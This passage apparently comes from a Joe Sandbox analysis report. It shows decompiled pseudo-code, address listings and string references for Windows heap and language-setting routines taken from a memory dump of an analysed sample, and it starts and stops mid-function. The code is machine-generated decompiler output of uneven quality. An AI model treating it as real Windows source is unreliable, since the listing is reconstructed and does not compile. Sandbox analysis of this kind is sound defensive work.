					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E016ABB40(_t267,  &_v68, _t224);
						if(L016743C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                    0x01673d3c
                    0x01673d42
                    0x01673d44
                    0x01673d46
                    0x01673d49
                    0x01673d4c
                    0x01673d4f
                    0x01673d52
                    0x01673d55
                    0x01673d58
                    0x01673d5b
                    0x01673d5f
                    0x01673d61
                    0x01673d66
                    0x016c8213
                    0x016c8218
                    0x01674085
                    0x01674088
                    0x0167408e
                    0x01674094
                    0x0167409a
                    0x016740a0
                    0x016740a6
                    0x016740a9
                    0x016740af
                    0x016740b6
                    0x016740bd
                    0x016740bd
                    0x01673d83
                    0x016c821f
                    0x016c8229
                    0x016c8238
                    0x016c8238
                    0x016c823d
                    0x016c823d
                    0x01673da0
                    0x01673daf
                    0x01673db5
                    0x01673dba
                    0x01673dba
                    0x01673dd4
                    0x01673e94
                    0x01673eab
                    0x01673f6d
                    0x01673f84
                    0x0167406b
                    0x0167406b
                    0x0167406e
                    0x0167406e
                    0x01674070
                    0x01674074
                    0x016c8351
                    0x016c8351
                    0x0167407a
                    0x0167407f
                    0x016c835d
                    0x016c8370
                    0x016c8377
                    0x016c8379
                    0x016c837c
                    0x016c837c
                    0x016c835d
                    0x00000000
                    0x0167407f
                    0x01673f8a
                    0x01673f8d
                    0x01673f90
                    0x01673f95
                    0x016c830d
                    0x016c830f
                    0x01673f9b
                    0x01673fac
                    0x01673fae
                    0x01673fb1
                    0x01673fb1
                    0x01673fb6
                    0x016c8317
                    0x016c831a
                    0x00000000
                    0x01673fbc
                    0x01673fc1
                    0x01673fc9
                    0x01673fd7
                    0x01673fda
                    0x01673fdd
                    0x01674021
                    0x01674021
                    0x01674029
                    0x01674030
                    0x01674044
                    0x01674046
                    0x01674046
                    0x01674044
                    0x01674049
                    0x016c8327
                    0x016c8334
                    0x016c8339
                    0x016c833c
                    0x0167404f
                    0x0167404f
                    0x0167404f
                    0x01674051
                    0x01674056
                    0x01674063
                    0x01674063
                    0x01674068
                    0x00000000
                    0x01674068
                    0x01673fdf
                    0x01673fe2
                    0x01673fe4
                    0x01673fe7
                    0x01673fef
                    0x01674003
                    0x01674005
                    0x01674005
                    0x0167400c
                    0x01674013
                    0x01674016
                    0x01674017
                    0x0167401b
                    0x0167401e
                    0x00000000
                    0x0167401e
                    0x01673fb6
                    0x01673eb1
                    0x01673eb4
                    0x01673eb7
                    0x01673ebc
                    0x016c82a9
                    0x016c82ab
                    0x01673ec2
                    0x01673ed3
                    0x01673ed5
                    0x01673ed8
                    0x01673ed8
                    0x01673edd
                    0x016c82b3
                    0x016c82b6
                    0x00000000
                    0x01673ee3
                    0x01673ee8
                    0x01673eed
                    0x01673ef0
                    0x01673ef3
                    0x01673f02
                    0x01673f05
                    0x01673f08
                    0x016c82c0
                    0x016c82c3
                    0x016c82c5
                    0x016c82c8
                    0x016c82d0
                    0x016c82e4
                    0x016c82e6
                    0x016c82e6
                    0x016c82ed
                    0x016c82f4
                    0x016c82f7
                    0x016c82f8
                    0x016c82fc
                    0x016c82ff
                    0x016c82ff
                    0x01673f0e
                    0x01673f11
                    0x01673f16
                    0x01673f1d
                    0x01673f31
                    0x016c8307
                    0x016c8307
                    0x01673f31
                    0x01673f39
                    0x01673f48
                    0x01673f4d
                    0x01673f50
                    0x01673f50
                    0x01673f53
                    0x01673f58
                    0x01673f65
                    0x01673f65
                    0x01673f6a
                    0x00000000
                    0x01673f6a
                    0x01673edd
                    0x01673dda
                    0x01673ddd
                    0x01673de0
                    0x01673de5
                    0x016c8245
                    0x01673deb
                    0x01673df7
                    0x01673dfc
                    0x01673dfe
                    0x01673e01
                    0x01673e01
                    0x01673e06
                    0x016c824d
                    0x016c824f
                    0x016c8254
                    0x00000000
                    0x01673e0c
                    0x01673e11
                    0x01673e16
                    0x01673e19
                    0x01673e29
                    0x01673e2c
                    0x01673e2f
                    0x016c825c
                    0x016c825f
                    0x016c8261
                    0x016c8264
                    0x016c826c
                    0x016c8280
                    0x016c8282
                    0x016c8282
                    0x016c8289
                    0x016c8290
                    0x016c8293
                    0x016c8294
                    0x016c8298
                    0x016c829b
                    0x016c829b
                    0x01673e35
                    0x01673e38
                    0x01673e3d
                    0x01673e44
                    0x01673e58
                    0x016c82a3
                    0x016c82a3
                    0x01673e58
                    0x01673e60
                    0x01673e6f
                    0x01673e74
                    0x01673e77
                    0x01673e77
                    0x01673e7a
                    0x01673e7f
                    0x01673e8c
                    0x01673e8c
                    0x01673e91
                    0x00000000
                    0x01673e91

                    Strings
                    • Kernel-MUI-Language-SKU, xrefs: 01673F70
                    • WindowsExcludedProcs, xrefs: 01673D6F
                    • Kernel-MUI-Language-Disallowed, xrefs: 01673E97
                    • Kernel-MUI-Number-Allowed, xrefs: 01673D8C
                    • Kernel-MUI-Language-Allowed, xrefs: 01673DC0
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                    • API String ID: 0-258546922
                    • Opcode ID: 4f997cea4fc556bc9369b349e708b3fec6c722c8b523fabcc6743cc5fddb2bee
                    • Instruction ID: 88814dec58363fba724912de9ae1f86bcef4af93cef3a1ffd2fd95f74a3b1e5a
                    • Opcode Fuzzy Hash: 4f997cea4fc556bc9369b349e708b3fec6c722c8b523fabcc6743cc5fddb2bee
                    • Instruction Fuzzy Hash: 1FF14D72D00619EFCB21DF98CD84AEEBBBAFF58650F15415AE505A7310EB749E01CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016640E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                    Download Yara Rule
                    C-Code - Quality: 29%
                    			E016640E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0166B150();
					} else {
						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0166B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0166B150(", passed to %s", _t29);
					}
					_push("\n");
					E0166B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1756378 = 1;
						asm("int3");
						 *0x1756378 = 0;
					}
					return 0;
				}
				return 1;
			}





                    0x016640e6
                    0x016640e8
                    0x016640f1
                    0x016c042d
                    0x016c044c
                    0x016c0451
                    0x016c042f
                    0x016c0444
                    0x016c0449
                    0x016c045d
                    0x016c0466
                    0x016c046e
                    0x016c0474
                    0x016c0475
                    0x016c047a
                    0x016c048a
                    0x016c048c
                    0x016c0493
                    0x016c0494
                    0x016c0494
                    0x00000000
                    0x016c049b
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                    • API String ID: 0-188067316
                    • Opcode ID: 924bf7acfe13535b646e3ae0bcf6aa05832f28fc180b1651726f4866af4d0297
                    • Instruction ID: 0d69fb1821986ae24df67368d32328d71aeaf7aa9cca3a3e25fb9f5335d39f3f
                    • Opcode Fuzzy Hash: 924bf7acfe13535b646e3ae0bcf6aa05832f28fc180b1651726f4866af4d0297
                    • Instruction Fuzzy Hash: 3F01D877215641EFD3299B69EC0DF62F7A9DB42F35F19C06DF005877418BA49480C619
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0168A830 Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 70%
                    			E0168A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x1758748 - 1;
					if( *0x1758748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E0166B150();
									_t260 = _t257 + 4;
								} else {
									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E0166B150();
								_t257 = _t260 + 4;
								__eflags =  *0x1757bc8;
								if(__eflags == 0) {
									E01722073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0172A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E016BD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E0168AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0172A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0172A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x1758748 - 1;
					if( *0x1758748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E0166B150();
							} else {
								E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E0166B150();
							__eflags =  *0x1757bc8;
							if(__eflags == 0) {
								_t131 = E01722073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                    0x0168a83a
                    0x0168a83c
                    0x0168a83e
                    0x0168a841
                    0x0168a844
                    0x0168a84a
                    0x0168aa53
                    0x0168aa59
                    0x0168aa59
                    0x0168a858
                    0x0168a85e
                    0x0168aaf5
                    0x0168aafc
                    0x016d229e
                    0x016d22a2
                    0x016d22a8
                    0x016d22b3
                    0x016d22b5
                    0x016d22bb
                    0x016d22c1
                    0x016d22c5
                    0x016d22e6
                    0x016d22eb
                    0x016d22f0
                    0x016d22c7
                    0x016d22dc
                    0x016d22e1
                    0x016d22e1
                    0x016d22f3
                    0x016d22f8
                    0x016d22fd
                    0x016d2300
                    0x016d2307
                    0x016d230e
                    0x016d230e
                    0x016d2313
                    0x016d2313
                    0x016d22b5
                    0x016d22a2
                    0x0168aafc
                    0x0168a864
                    0x0168a869
                    0x0168aa5c
                    0x0168aa5e
                    0x0168a86f
                    0x0168a87f
                    0x0168a885
                    0x0168a885
                    0x0168a88b
                    0x0168a890
                    0x0168a896
                    0x0168ab0c
                    0x0168ab0f
                    0x0168ab15
                    0x016d2320
                    0x016d2320
                    0x0168ab1b
                    0x0168a89c
                    0x0168a89f
                    0x0168a8a2
                    0x0168a8a2
                    0x0168a8a5
                    0x0168a8af
                    0x0168a8b3
                    0x0168a8b8
                    0x0168aa66
                    0x0168a8be
                    0x0168a8c5
                    0x0168a8c6
                    0x0168a8ce
                    0x016d2328
                    0x016d2332
                    0x016d2337
                    0x016d2337
                    0x0168a8ce
                    0x0168a8d4
                    0x0168a8d8
                    0x0168a8db
                    0x0168a8de
                    0x0168a8e1
                    0x0168a8e5
                    0x0168a8e8
                    0x0168a8f0
                    0x0168a8f3
                    0x016d234c
                    0x016d2350
                    0x016d2355
                    0x016d2359
                    0x016d2359
                    0x0168a8f9
                    0x0168a901
                    0x0168aae4
                    0x0168aae4
                    0x0168aaea
                    0x00000000
                    0x0168a907
                    0x0168a90a
                    0x0168a91d
                    0x0168a91d
                    0x00000000
                    0x0168a910
                    0x0168a910
                    0x0168a910
                    0x0168a914
                    0x0168a924
                    0x0168a924
                    0x0168a924
                    0x0168a924
                    0x0168a916
                    0x0168a91b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0168a91b
                    0x0168a925
                    0x0168a925
                    0x0168a932
                    0x0168a936
                    0x0168a93c
                    0x0168a93c
                    0x0168a93c
                    0x0168ab22
                    0x0168ab24
                    0x0168ab27
                    0x0168ab27
                    0x0168a942
                    0x0168a944
                    0x0168aaba
                    0x0168aabd
                    0x0168aac0
                    0x0168aac0
                    0x0168aac2
                    0x0168ab2f
                    0x0168aac4
                    0x0168aac4
                    0x0168aac7
                    0x0168aaca
                    0x0168aacc
                    0x0168aace
                    0x0168aace
                    0x0168aace
                    0x0168aad1
                    0x0168aad1
                    0x0168aad7
                    0x0168aad9
                    0x00000000
                    0x00000000
                    0x016d2361
                    0x016d2369
                    0x016d236b
                    0x00000000
                    0x016d2371
                    0x00000000
                    0x016d2371
                    0x00000000
                    0x016d236b
                    0x0168aac0
                    0x0168a94a
                    0x0168a94a
                    0x0168a94d
                    0x0168a94d
                    0x0168a950
                    0x0168a954
                    0x016d2376
                    0x016d2380
                    0x0168a95a
                    0x0168a95a
                    0x0168a95c
                    0x0168a95f
                    0x0168a961
                    0x0168a961
                    0x0168a967
                    0x0168a96a
                    0x0168a972
                    0x0168aa02
                    0x0168aa06
                    0x0168aa10
                    0x0168aa16
                    0x0168aa16
                    0x0168aa1b
                    0x0168aa21
                    0x0168aa24
                    0x0168aa27
                    0x0168aa29
                    0x0168aa2c
                    0x0168aa32
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0168a978
                    0x0168a978
                    0x0168a97b
                    0x0168a981
                    0x0168a996
                    0x0168a998
                    0x0168a99f
                    0x0168a9a2
                    0x016d238a
                    0x0168a9a8
                    0x0168a9a8
                    0x0168a9a8
                    0x0168a9aa
                    0x0168a9ad
                    0x0168a9b0
                    0x0168a9bb
                    0x0168a9be
                    0x0168a9c7
                    0x0168a9c9
                    0x0168a9c9
                    0x0168a9cc
                    0x0168a9d1
                    0x0168aa6d
                    0x0168aa70
                    0x0168aa73
                    0x0168aa75
                    0x0168aa79
                    0x0168aa7e
                    0x0168aa82
                    0x0168aa8f
                    0x0168aa94
                    0x0168aa96
                    0x016d2392
                    0x016d23a1
                    0x016d23a1
                    0x0168aa9c
                    0x0168aa9f
                    0x0168aaa2
                    0x0168aaa2
                    0x0168aaa8
                    0x0168aaab
                    0x0168aaaf
                    0x00000000
                    0x0168aab5
                    0x00000000
                    0x0168aab5
                    0x0168a9d7
                    0x0168a9d7
                    0x0168a9da
                    0x0168a9e0
                    0x0168a9e3
                    0x0168a9e6
                    0x0168a9e9
                    0x0168a9eb
                    0x0168a9fd
                    0x0168a9fd
                    0x00000000
                    0x0168a9eb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0168a983
                    0x0168a983
                    0x0168a983
                    0x0168a987
                    0x0168a995
                    0x0168a995
                    0x0168a995
                    0x0168a995
                    0x0168a989
                    0x0168a98e
                    0x00000000
                    0x0168a990
                    0x00000000
                    0x0168a990
                    0x0168a98e
                    0x00000000
                    0x0168a983
                    0x0168a972
                    0x0168a90a
                    0x0168aa34
                    0x0168aa34
                    0x0168aa40
                    0x0168aa43
                    0x0168aa46
                    0x0168aa4d
                    0x016d23ab
                    0x016d23b2
                    0x016d23b8
                    0x016d23be
                    0x016d23c3
                    0x016d23c5
                    0x016d23cb
                    0x016d23d1
                    0x016d23d5
                    0x016d23f6
                    0x016d23fb
                    0x016d23d7
                    0x016d23ec
                    0x016d23f1
                    0x016d2403
                    0x016d2408
                    0x016d2410
                    0x016d2417
                    0x016d2422
                    0x016d2422
                    0x016d2417
                    0x016d23c5
                    0x016d23b2
                    0x00000000

                    Strings
                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 016D22F3
                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 016D2403
                    • HEAP: , xrefs: 016D22E6, 016D23F6
                    • HEAP[%wZ]: , xrefs: 016D22D7, 016D23E7
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                    • API String ID: 0-1657114761
                    • Opcode ID: dd7bea69936bfdf3b903b4bde363c6a9f04e299f3398fc896ad744e68663fd86
                    • Instruction ID: 876c9e2407fba654f4965ab6c47621d774b2a99002fe142b349383c3914531ba
                    • Opcode Fuzzy Hash: dd7bea69936bfdf3b903b4bde363c6a9f04e299f3398fc896ad744e68663fd86
                    • Instruction Fuzzy Hash: A7D1C074A042069FDB19DFA8C890BBAB7F2FF48300F15866EDD569B741E734A842CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0168A229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                    Download Yara Rule
                    C-Code - Quality: 69%
                    			E0168A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0168DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E016A9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0172A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E016A9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E0166B150();
					} else {
						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E0166B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E01687D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0172138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E01687D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
